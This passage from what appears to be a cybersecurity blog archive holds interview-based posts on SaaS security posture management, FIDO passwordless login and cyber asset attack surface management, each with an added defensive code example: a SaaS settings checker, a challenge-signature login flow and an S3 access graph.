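    print(json.dumps(r, indent=2), "\ntrustworthy:", is_trustworthy(r))
```

A component without a hash in the SBOM can only be checked by name and version, which is exactly the gap a tampered rebuild slips through; insist on hashes from suppliers.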

In today’s environment, organizations need to figure out how to secure their external edge, that’s for certain. But it’s equally important to account for their internal edge, to stop software tampering in its tracks. It’s encouraging that the technology to do that is available. I’ll keep watch and keep reporting.


Companies have come to depend on Software as a Service – SaaS — like never before.

Related: Managed security services catch on

From Office 365 to Zoom to Salesforce.com, cloud-hosted software applications have come to make up the nerve center of daily business activity. Companies now reach for SaaS apps for clerical chores, conferencing, customer relationship management, human resources, salesforce automation, supply chain management, web content creation and much more, even security.

This development has intensified the pressure on companies to fully engage in the “shared responsibility” model of cybersecurity, a topic that will be in the limelight at RSA Conference 2022 next week in San Francisco.

I visited with Maor Bin, co-founder and CEO of Tel Aviv-based Adaptive Shield, a pioneer in a new security discipline referred to as SaaS Security Posture Management (SSPM). SSPM is part of an emerging class of security tools that are being ramped up to help companies dial in SaaS security settings as they should have started doing long ago.

This fix is just getting under way. For a full drill down, please give the accompanying podcast a listen. Here are the key takeaways:

Shrugging off security

A sharp line got drawn in the sand, some years ago, when Amazon Web Services (AWS) took the lead in championing the shared responsibility security model.

To accelerate cloud migration, AWS, Microsoft Azure and Google Cloud committed to securing the hosted IT infrastructure they rent to enterprises, meaning the physical hosts, the hypervisors and the managed services, at least on their end. Everything above that line, including identities, data, network rules and the sprawling set of security settings each service exposes, was left for the customer’s security team to configure. It was left up to each company to dial in just the right amount of security vs. convenience.

SaaS vendors, of course, readily adopted the shared responsibility model pushed out by the IT infrastructure giants. Why wouldn’t they? Thus, the burden was laid squarely on company security teams to harden cloud-connections on their end.


What happened next was predictable. Caught up in chasing the productivity benefits of cloud computing, many companies looked past doing any security due diligence, Bin says.

Security teams ultimately were caught flat-footed, he says. Security analysts had gotten accustomed to locking down servers and applications that were on premises and within their arms’ reach. But they couldn’t piece together the puzzle of how to systematically configure myriad overlapping security settings scattered across dozens of SaaS applications.

The National Institute of Standards and Technology has long published control catalogs that cover this ground: SP 800-53 for federal systems and SP 800-171 for protecting controlled unclassified information on contractors’ systems. But these are general catalogs of controls, not step-by-step guides to configuring a given SaaS application, and many companies simply shrugged off the NIST guidance.

“It turned out to be very hard for security teams to get control of SaaS applications,” Bin observes.  “First of all, there was a lack of any knowledge base inside companies and often times the owner of the given SaaS app wasn’t very cooperative.”

SaaS due diligence

Threat actors, of course, didn’t miss their opportunity. Wave after wave of successful exploits took full advantage of the misconfigurations spinning out of cloud migration. Fraudulent cash transfers, massive ransomware payouts, infrastructure and supply chain disruptions all climbed to new heights. And malicious hackers attained deep, unauthorized access left and right. Every CISO should, by now, cringe at the thought of his or her organization becoming the next Capital One, SolarWinds or Colonial Pipeline (a misconfigured cloud role, a poisoned software update and a VPN account without MFA, respectively).

At RSA Conference 2022, which opens next week in San Francisco, the buzz will be around the good guys finally getting their act together and pushing back. For instance, an entire cottage industry of cybersecurity vendors has ramped up specifically to help companies improve their cloud “security posture management.”

This includes advanced cloud access security broker (CASB) and cyber asset attack surface management (CAASM) tools.  SSPM solutions, like Adaptive Shield’s, are among the newest and most innovative tools. Other categories getting showcased at RSAC 2022 include cloud security posture management (CSPM) and application security posture management (ASPM) technologies.

For its part, Adaptive Shield supplies a solution designed to provide full visibility and control of every granular security configuration in some 70 SaaS applications now used widely by enterprises. This can range from dozens to hundreds of security toggles, per application, controlling things like privileged access, multi-factor authentication, phishing protection, digital key management, auditing and much more.

Tools at hand

Security teams now have the means to methodically filter through and make strategic adjustments of each and every SaaS security parameter. Misconfigurations – i.e. settings that don’t meet NIST best practices — can be addressed immediately, or a service ticket can be created and sent on its way.
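What "filtering through each SaaS security parameter" looks like in practice is a baseline of expected values, a snapshot of the tenant's actual settings pulled over the vendor's admin API, and a list of findings with a severity and a fix that can be handed to the app owner as a ticket. The following is an added example, not Adaptive Shield's product, over a constructed tenant snapshot; the setting names are hypothetical and do not correspond to any vendor's real API fields, and the date is fixed so the result is reproducible.

```python
"""
Added example (not Adaptive Shield's product): a small SaaS posture check. TENANT
is a constructed snapshot of the kind an SSPM tool pulls over a SaaS vendor's
admin API, flattened into one dict; the setting names are hypothetical, not any
vendor's real fields. Each rule states what is expected, a severity and a
remediation, and evaluate() returns a ticket-ready list of findings.
"""
from datetime import date

TODAY = date(2022, 6, 6)   # fixed so the example is reproducible

TENANT = {  # constructed snapshot, not a real tenant
    "mfa_required_for_all_users": False,
    "mfa_required_for_admins": True,
    "session_timeout_minutes": 43200,            # 30 days
    "external_sharing": "anyone_with_link",
    "global_admins": ["alice", "bob", "carol", "dan", "erin", "frank"],
    "api_tokens": [
        {"owner": "ci-bot", "created": "2021-01-15", "expires": None},
        {"owner": "alice",  "created": "2022-05-01", "expires": "2022-08-01"},
    ],
    "audit_log_retention_days": 30,
}


def _stale_tokens(t):
    """Non-expiring API tokens older than 90 days are a standing credential."""
    stale = [tok["owner"] for tok in t["api_tokens"]
             if tok["expires"] is None and (TODAY - date.fromisoformat(tok["created"])).days > 90]
    return f"non-expiring API tokens older than 90 days: {stale}" if stale else None


# (rule id, severity, check -> detail string or None, remediation)
RULES = [
    ("mfa-all", "high",
     lambda t: None if t["mfa_required_for_all_users"] else "MFA is not enforced for all users",
     "Enable tenant-wide MFA enforcement"),
    ("mfa-admin", "critical",
     lambda t: None if t["mfa_required_for_admins"] else "MFA is not enforced for admins",
     "Enforce MFA for every admin role immediately"),
    ("session", "medium",
     lambda t: None if t["session_timeout_minutes"] <= 720 else f"session timeout is {t['session_timeout_minutes']} minutes",
     "Set session timeout to 12 hours or less"),
    ("sharing", "high",
     lambda t: None if t["external_sharing"] in ("disabled", "allowlisted_domains") else f"external sharing is '{t['external_sharing']}'",
     "Restrict external sharing to allowlisted partner domains"),
    ("admins", "medium",
     lambda t: None if len(t["global_admins"]) <= 4 else f"{len(t['global_admins'])} global admins",
     "Reduce global admins to 4 or fewer; use scoped admin roles"),
    ("tokens", "high", _stale_tokens,
     "Rotate the listed tokens and set an expiry on all new ones"),
    ("audit", "medium",
     lambda t: None if t["audit_log_retention_days"] >= 365 else f"audit log retention is {t['audit_log_retention_days']} days",
     "Retain audit logs for at least a year or export them to the SIEM"),
]

SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}


def evaluate(tenant):
    """Run every rule; return findings sorted by severity (stable, so rule order breaks ties)."""
    findings = []
    for rule_id, severity, check, fix in RULES:
        detail = check(tenant)
        if detail:
            findings.append({"rule": rule_id, "severity": severity, "detail": detail, "remediation": fix})
    return sorted(findings, key=lambda f: SEVERITY_ORDER[f["severity"]])


if __name__ == "__main__":
    for f in evaluate(TENANT):
        print(f"[{f['severity']:8}] {f['rule']:9} {f['detail']}  ->  {f['remediation']}")
```

Two design points carry over to real tooling: the check is re-run on a schedule, because a setting an admin flips back is the drift Bin calls hygiene, and the thresholds (admin count, token age, retention) are the organization's own baseline rather than a vendor default.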

“I like to call this SaaS security hygiene,” Bin says. “It’s a way to align your users, your devices and your third-party applications with different activities and different privileges. Misconfigurations are a huge part of it, but it’s just one of the moving parts of securing your SaaS.”

Doing this level of SaaS security due diligence on a consistent basis is clearly something well worth doing and something that needs to become standard practice. It will steadily improve an organization’s cloud security policies over time; and it should also promote security awareness and reinforce security best practices far beyond the security team, namely to the users of the apps.

Company by company this will slow the expansion of the attack surface, perhaps even start to help shrink the attack surface over time. Things are moving in a good direction. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

Google, Microsoft and Apple are bitter arch-rivals who don’t often see eye-to-eye.

Related: Microsoft advocates regulation of facial recognition tools

Yet, the tech titans recently agreed to adopt a common set of standards supporting passwordless access to websites and apps.

This is one giant leap towards getting rid of passwords entirely. Perhaps not coincidentally, it comes at a time when enterprises have begun adopting passwordless authentication systems in mission-critical parts of their internal operations.

Excising passwords as the security linchpin to digital services is long, long overdue. It may take a while longer to jettison them completely, but now there truly is a light at the end of the tunnel.

I recently sat down with Ismet Geri, CEO of Veridium, to discuss what the passwordless world we’re moving towards might be like. For a full drill down on our wide-ranging discussion, please give a listen to the accompanying podcast. Here are a few takeaways.

Security + efficiency

Passwordless technology is certainly ready for prime time; innovative solutions from suppliers like Cisco’s Duo, Hypr, OneLogin and Veridium have been steadily gaining traction in corporate settings for the past few years.

And the pace of adoption is quickening, Geri told me. Companies in the throes of digital transformation, and especially post Covid19, have never been more motivated to adopt a new authentication paradigm, one that eliminates shared secrets.

Password abuse at scale followed the 1990s decision to make shared secrets the basis for securing digital connections. Fortifications such as multi-factor authentication (MFA) and password managers proved to be mere speed bumps: threat actors now routinely get past the weaker forms of MFA, relaying one-time codes through a phishing site or spamming push prompts until the user taps approve. What closes that gap is an authenticator that cryptographically binds the credential to the legitimate site, which is the approach the FIDO standards take.

No small part of the problem is that passwords and MFA require a significant amount of human interaction. “Relying on shared secrets doesn’t work anymore, because we have too many accounts and no one can remember hundreds of passwords,” Geri says. “Our brains just won’t do it.”

As companies accelerate their dependence on hosted cloud services, the clunkiness of passwords and MFA is exacting a toll on productivity. One bank in the U.S. Northeast, for instance, was concerned about tellers having to type in their passwords 50 or more times a day. “They wanted to make their tellers’ work life easier, more friendly and seamless, and at the same time improve security,” Geri says.

This was accomplished by using web cameras at each terminal tied into Veridium facial recognition software. Instead of the teller having to type in a username and password, then also use a second-factor of authentication over and over, access now happens silently and swiftly based on who the teller is. Thus, the bank measurably reduced its exposure to password abuse, while also lightening the burden on each teller.

Adoption scenarios


Outside of the banking industry, which strictly prohibits the use of BYOD smartphones for tellers, many organizations have begun adopting passwordless solutions by leveraging their employees’ personally-owned smartphones. Passwordless access to company resources goes something like this: Instead of a logon prompt asking for a username and password, the employee gets presented with a QR code.

The employee scans the QR code with the smartphone. A phone app then uses the onboard biometric sensor, fingerprint or facial, to authenticate the employee to the company’s server. “The most common adoption scenario that we see is companies seeking a passwordless experience across all of their applications,” Geri says.
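To make the exchange concrete, here is an added Go example of the QR-code flow. It is not Veridium’s code, which the article does not show, but the general FIDO-style pattern such products follow: the phone holds a private key that the biometric check releases, the server stores only the matching public key, and what crosses the network is a signature over a one-time challenge bound to the server’s origin. The origin strings, user IDs and the biometricOK flag are stand-ins.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/base64"
	"errors"
	"fmt"
	"time"
)

// QRPayload is what the logon page encodes in the QR code. Nothing in it is secret:
// Challenge is a one-time nonce tied to a pending session, and Origin lets the
// phone refuse to sign for a site it never enrolled with.
type QRPayload struct{ SessionID, Challenge, Origin string }

type session struct{ challenge []byte; expires time.Time }

// Server stores public keys only: a dump of this table cannot be replayed to
// log in, which is exactly the property a table of password hashes lacks.
type Server struct {
	origin   string
	keys     map[string]ed25519.PublicKey // user -> enrolled device public key
	sessions map[string]*session
}

func NewServer(origin string) *Server {
	return &Server{origin, map[string]ed25519.PublicKey{}, map[string]*session{}}
}

// Enrol records the public half of a key pair the phone generated; the private
// half stays on the phone and is released only by its biometric sensor.
func (s *Server) Enrol(user string, pub ed25519.PublicKey) { s.keys[user] = pub }

// BeginLogin opens a pending session and returns the QR code contents.
func (s *Server) BeginLogin() (QRPayload, error) {
	buf := make([]byte, 48) // 16-byte session id followed by a 32-byte challenge
	if _, err := rand.Read(buf); err != nil {
		return QRPayload{}, err
	}
	id := base64.RawURLEncoding.EncodeToString(buf[:16])
	s.sessions[id] = &session{buf[16:], time.Now().Add(2 * time.Minute)}
	return QRPayload{id, base64.StdEncoding.EncodeToString(buf[16:]), s.origin}, nil
}

// signedMessage binds the signature to both origin and nonce, so a signature
// captured for one site or one login attempt is useless for any other.
func signedMessage(origin string, chal []byte) []byte {
	return append([]byte("passwordless-login/v1|"+origin+"|"), chal...)
}

// Phone stands in for the app: it holds the private key and signs only after
// the biometric check passes, and only for the origin it enrolled with.
type Phone struct{ user, origin string; priv ed25519.PrivateKey }

func NewPhone(user, origin string) (*Phone, ed25519.PublicKey, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	return &Phone{user, origin, priv}, pub, err
}

type Assertion struct{ SessionID, User string; Signature []byte }

// Scan runs after the camera decodes the QR code; biometricOK is the sensor result.
func (p *Phone) Scan(qr QRPayload, biometricOK bool) (Assertion, error) {
	if !biometricOK || qr.Origin != p.origin {
		return Assertion{}, fmt.Errorf("not signing: biometricOK=%v, origin=%q", biometricOK, qr.Origin)
	}
	chal, err := base64.StdEncoding.DecodeString(qr.Challenge)
	if err != nil {
		return Assertion{}, err
	}
	return Assertion{qr.SessionID, p.user, ed25519.Sign(p.priv, signedMessage(qr.Origin, chal))}, nil
}

// FinishLogin verifies the assertion against the enrolled key and consumes the
// challenge, so the same assertion replayed a second time is rejected.
func (s *Server) FinishLogin(a Assertion) error {
	sess, ok := s.sessions[a.SessionID]
	if !ok {
		return errors.New("unknown or already-used session")
	}
	delete(s.sessions, a.SessionID) // single use, whether or not it verifies
	pub, enrolled := s.keys[a.User]
	switch {
	case time.Now().After(sess.expires):
		return errors.New("challenge expired")
	case !enrolled || !ed25519.Verify(pub, signedMessage(s.origin, sess.challenge), a.Signature):
		return errors.New("signature does not verify against the enrolled key")
	}
	return nil
}

func main() {
	const origin = "https://teller.example-bank.internal" // hypothetical
	srv := NewServer(origin)
	phone, pub, _ := NewPhone("jdoe", origin)
	srv.Enrol("jdoe", pub)
	qr, _ := srv.BeginLogin()
	a, _ := phone.Scan(qr, true)
	fmt.Println("login:", srv.FinishLogin(a))  // <nil>
	fmt.Println("replay:", srv.FinishLogin(a)) // unknown or already-used session
	qr.Origin = "https://teller-example-bank.evil" // phishing page relaying the real QR challenge
	_, err := phone.Scan(qr, true)
	fmt.Println("phish:", err)
}
```

Three failure modes are exercised: replaying a captured assertion fails because the challenge is consumed on first use; a phishing page that relays the real QR code fails because the phone refuses to sign for a different origin; and nothing is signed at all unless the biometric check passes. Note what the server never sees: the biometric itself, which stays on the phone as the thing that unlocks the key.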

Talk about turning Bring Your Own Device security concerns on their head. Passwordless solutions now enable companies to turn BYOD into a strategic tool. When you consider how password abuse has grown into a full-blown criminal specialty, it’s easy to measure the security gained from shutting down password abuse vectors.

The efficiency gain comes from reducing logon sprawl; today employees are required to repeatedly type in a username and password, then also use various forms of MFA to connect to the company network, to log onto cloud-hosted productivity and collaboration tools, as well as to access operational software.

Coming advances

In short, what’s happening is that companies are shifting to passwordless authenticators because they materially improve security, but also leverage tools like a smartphone which is far less likely to be left behind or misplaced.

Google, Microsoft and Apple now get this. After a decade of sitting on the fence, the tech giants on May 5 announced that they would formally adopt standards pulled together by the FIDO Alliance.

FIDO stands for Fast IDentity Online. It’s a set of industry standards, akin to WiFi and Bluetooth, that encourages the development and use of passwordless authenticators. Any device manufacturer, software developer or online service provider can integrate FIDO protocols and policies into their products and services. The May 2022 announcement specifically covers support for multi-device FIDO credentials, since marketed as passkeys, which let a user’s private key be synced across devices rather than being tied to a single authenticator.

Whatever their ulterior motives, Google, Microsoft and Apple should be congratulated for finally seeing the light. They’ve dispatched spokesmen to herald “eliminating the vulnerability of passwords” and to tout “making passwordless part of consumer lives” and “completing the shift to a passwordless world.” Maybe the tech giants finally noticed the train leaving and thought it wise to jump on board.

For its part, Veridium launched in 2016 with a laser focus on designing passwordless systems from scratch that directly addressed the growing frustration of IT department and security team leaders.

Attaining ‘recognition’

Geri told me that Veridium is already three years into development of a major advance – technology that can take into account behavioral biometrics, such as the pattern of hand movement a person habitually uses when using a fingerprint or iris sensor.

By remembering nuances about movements and other behavior traits over time, this technology will make Veridium’s platform swifter and surer about authenticating a user, Geri told me.

“It’s a concept I call recognition,” he says. “Behavior patterns combined with a strong authentication asset, which is your biometrics, could get us very close to starting to recognize you.”

More such advances are coming. How they get used in a global sense remains to be seen.

Will passwordless authenticators serve mainly to tighten the iron grip that the social media giants hold on consumers’ online personas? Or could these advances foster a fresh trend, one that supports a fairer distribution of wealth, say like the mainstreaming of self-sovereign identities? We’re destined to soon find out. I’ll keep watch and keep reporting.


The shift to software-defined everything and reliance on IT infrastructure scattered across the Internet has boosted corporate productivity rather spectacularly.

Related: Stopping attack surface expansion

And yet, the modern attack surface continues to expand exponentially, largely unchecked. This dichotomy cannot be tolerated over the long run.

Encouragingly, an emerging class of network visibility technology is gaining notable traction. These specialized tools are expressly designed to help companies get a much better grip on the sprawling array of digital assets they’ve come to depend on. Gartner refers to this nascent technology and emerging discipline as “cyber asset attack surface management,” or CAASM.

I sat down with Erkang Zheng, founder and CEO of JupiterOne, a Morrisville, NC-based CAASM platform provider, to discuss how security got left so far behind in digital transformation – and why getting attack surface management under control is an essential first step to catching up.

For a full drill down, please give the accompanying podcast a listen. Here are my takeaways:

Shoring up fast-and-risky

For most of the past 25 years, company networks were made up of clearly defined internal boundaries encompassed by a hard-and-fast perimeter. And the role of the security team was straightforward: defend the network, protect IT.

But then along came digital transformation. Internal and external network boundaries gave way to agile software development and everything-as-a-hosted-service. Organizations today move as fast as they can, expect to break things and count on iterating improvements on the fly. Fast-and-risky has become the working definition of software innovation.

Rock star developers in cutting-edge organizations are encouraged to make things happen. They live and die by the tenets of open source and DevOps and lean on cloud-native IT infrastructure. Accelerating complexity has been the result.

The problem with following the fast-and-risky mantra is that many failures turn out to be architectural in nature, are not easy to fix and can all too easily escape notice or, worse, be ignored. Meanwhile, security teams, for the most part, have been stuck in a legacy mindset of striving to keep things as simple and as consistent as possible, Erkang observes.

And this, he argues, is where threat actors foment chaos. It seems ludicrous, but in one sense it’s easier than ever for malicious hackers to get deep access, steal data, spread ransomware, disrupt infrastructure and maintain persistent unauthorized access.


“There’s a fundamental disconnect between what the business wants and what the security team wants,” Erkang told me. “And this is where the chaos comes from . . . the bad guy hackers aren’t necessarily taking advantage of the complexity; they’re really taking advantage of this disconnect.”

Embracing complexity

The opportunity, going forward then, is for security to jump fully onboard the digital transformation bandwagon.

Legacy defenses at the gateway, firewall, endpoint and application levels must be rearchitected and scaled up. That’s what a passel of emerging security frameworks like Zero Trust Network Access (ZTNA), Cloud Workload Protection Platform (CWPP), Cloud Security Posture Management (CSPM) and Secure Access Service Edge (SASE) are all about. Network security must be architected to effectively blunt non-stop malicious probing and cut off the breaches enabled in a fast-and-risky operating environment.

At the same time, the expansion of the attack surface somehow needs to be slowed — and ultimately reversed. And this is where CAASM technology and practices come in – by fostering cyber hygiene on the ground floor.

Erkang is in the camp making the argument that security teams have an opportunity to lead the way by not merely tolerating complexity but by embracing it. “Security needs to focus on supporting innovation and advancement by understanding complexity; this is now possible with data, with automation and with an engineering mindset,” he says.

Anything and everything that supports any element of digital operations ought to be considered a cyber asset that needs constant care and feeding — with security top of mind, he says. CAASM technology leverages APIs to make it possible for security teams to impose context on the ephemeral connections flying between things like microservices, virtual storage and hosted services.

With context, granular policies can then be set in place and enforced. Machine learning and automation can be brought to bear in a way that infuses security without unduly hindering agility. A lot can be gained by simply imposing wise configuration of all cyber assets, Erkang says. What’s more, this same level of granular analysis and policy enforcement can — and should — be directed at identifying, monitoring and patching software vulnerabilities, he argues.

Taking the security angle

In one sense, taming complexity is all about understanding context. Erkang makes a strong argument that the best way for an organization to gain actionable understanding of its cyber assets in a fast-and-risky operating environment is to come at it from the security perspective.

Erkang gave me the example of a company seeking to take stock of its cloud data stores. Let’s say an organization wants to more proactively manage its Amazon Web Services S3 buckets. JupiterOne, in this scenario, would assemble and maintain a detailed catalogue of the configuration status of all these assets.

Granular policies could then be enforced that consider the sensitivity of data held in any given S3 bucket, as well as the associated access privileges. These are privileges that often are allowed by default to cascade across several tiers of user groups — in support of the go-fast-and-break mindset. Tightening these privileges with just the right touch shrinks the attack surface.
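The S3 scenario above, worked as an added Go example. It is not JupiterOne’s code or query language, but a constructed asset graph of buckets, groups and users in which a read grant cascades through nested groups, a traversal that computes who can effectively read each bucket and by which chain, and a policy that caps effective readers on buckets classified as sensitive. The entity kinds, relationship verbs, classification values and sample data are hypothetical.

```go
package main

import (
	"fmt"
	"sort"
)

// Entity kinds and relationship verbs of the constructed graph (hypothetical names).
const (
	KindBucket, KindGroup, KindUser = "aws_s3_bucket", "iam_group", "iam_user"
	Allows, MemberOf               = "ALLOWS", "MEMBER_OF" // bucket->principal, member->group
)

// Sensitivity is the data-classification tag; only buckets carry one here.
type Entity struct{ ID, Kind, Sensitivity string }
type Relationship struct{ From, Verb, To string }

// Graph keeps one adjacency, reach: bucket -> principals it grants and group ->
// its direct members, so a single walk follows a grant down every tier of nesting.
type Graph struct {
	entities map[string]Entity
	reach    map[string][]string
}

func NewGraph(es []Entity, rs []Relationship) *Graph {
	g := &Graph{map[string]Entity{}, map[string][]string{}}
	for _, e := range es {
		g.entities[e.ID] = e
	}
	for _, r := range rs {
		switch r.Verb {
		case Allows:
			g.reach[r.From] = append(g.reach[r.From], r.To)
		case MemberOf: // stored from the group's side so the walk can descend
			g.reach[r.To] = append(g.reach[r.To], r.From)
		}
	}
	return g
}

// EffectiveReaders returns every user who can read the bucket, mapped to the chain
// of grant and groups that got them there. Each node is visited once, so nested-
// group cycles terminate and a user reachable two ways keeps the first path found.
func (g *Graph) EffectiveReaders(bucket string) map[string]string {
	type frame struct{ id, path string }
	seen, readers := map[string]bool{}, map[string]string{}
	stack := []frame{{bucket, bucket}}
	for len(stack) > 0 {
		f := stack[len(stack)-1]
		stack = stack[:len(stack)-1]
		if seen[f.id] {
			continue
		}
		seen[f.id] = true
		if g.entities[f.id].Kind == KindUser {
			readers[f.id] = f.path
			continue
		}
		for _, next := range g.reach[f.id] { // grantees of a bucket, members of a group
			stack = append(stack, frame{next, f.path + " > " + next})
		}
	}
	return readers
}

// OverExposed applies the policy "a pii or secret bucket has at most maxReaders
// effective readers"; per violation it lists the paths, which is what tells you
// which grant or group nesting to cut.
func OverExposed(g *Graph, maxReaders int) map[string][]string {
	out := map[string][]string{}
	for id, e := range g.entities {
		if e.Kind != KindBucket || (e.Sensitivity != "pii" && e.Sensitivity != "secret") {
			continue
		}
		if readers := g.EffectiveReaders(id); len(readers) > maxReaders {
			for _, path := range readers {
				out[id] = append(out[id], path)
			}
			sort.Strings(out[id])
		}
	}
	return out
}

// Constructed sample: contractors sit under all-engineering, and all-engineering
// was granted the PII bucket, so the grant cascades down to the contractors.
var sampleEntities = []Entity{
	{"s3:customer-exports", KindBucket, "pii"}, {"s3:build-artifacts", KindBucket, "internal"},
	{"grp:all-engineering", KindGroup, ""}, {"grp:data-platform", KindGroup, ""},
	{"grp:data-analysts", KindGroup, ""}, {"grp:contractors", KindGroup, ""},
	{"usr:alice", KindUser, ""}, {"usr:bob", KindUser, ""}, {"usr:carol", KindUser, ""},
	{"usr:dave", KindUser, ""}, {"usr:eve", KindUser, ""},
}
var sampleRelationships = []Relationship{
	{"usr:alice", MemberOf, "grp:data-platform"}, {"usr:bob", MemberOf, "grp:data-platform"},
	{"usr:carol", MemberOf, "grp:data-analysts"}, {"usr:dave", MemberOf, "grp:all-engineering"},
	{"usr:eve", MemberOf, "grp:contractors"}, {"grp:contractors", MemberOf, "grp:all-engineering"},
	{"grp:data-analysts", MemberOf, "grp:all-engineering"}, {"grp:data-platform", MemberOf, "grp:all-engineering"},
	{"s3:customer-exports", Allows, "grp:data-platform"}, {"s3:customer-exports", Allows, "grp:all-engineering"},
	{"s3:build-artifacts", Allows, "grp:all-engineering"},
}

func main() {
	for bucket, paths := range OverExposed(NewGraph(sampleEntities, sampleRelationships), 3) {
		fmt.Printf("%s: %d effective readers (limit 3): %v\n", bucket, len(paths), paths)
	}
}
```

Run on the sample, it reports s3:customer-exports with five effective readers against a limit of three, and the path for each reader shows that the grant to all-engineering is what pulls in the nested contractors group. Removing that one grant, rather than touching the data-platform team’s direct access, is the “right touch” the paragraph describes; the build-artifacts bucket has the same five readers but is not flagged because it is not classified as sensitive.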

According to Gartner, CAASM capabilities can help companies “improve basic security hygiene by ensuring security controls, security posture and asset exposure are understood and remediated across the environment.”

It strikes me that the beauty of this is that the visibility gained for security purposes, which strengthens security and lowers risk for organizations, also paves the way for more effective cyber asset management and operational effectiveness generally.

“Security needs to transform from an enforcing function to a business enabling and a wellness function,” Erkang says. “Understanding your cyber assets and how all the dots connect can be the starting point to proactively manage different functions, not just within security, but also outside of security, as well.”

It’s notable that an unprecedented number of fresh security frameworks are vying for traction at the moment. For company decision-makers, this can be confusing. But the effort to sort things out and determine what works best for their organization is well worth it. This is all part of raising the security bar. CAASM could be a cornerstone. I’ll keep watch and keep reporting.
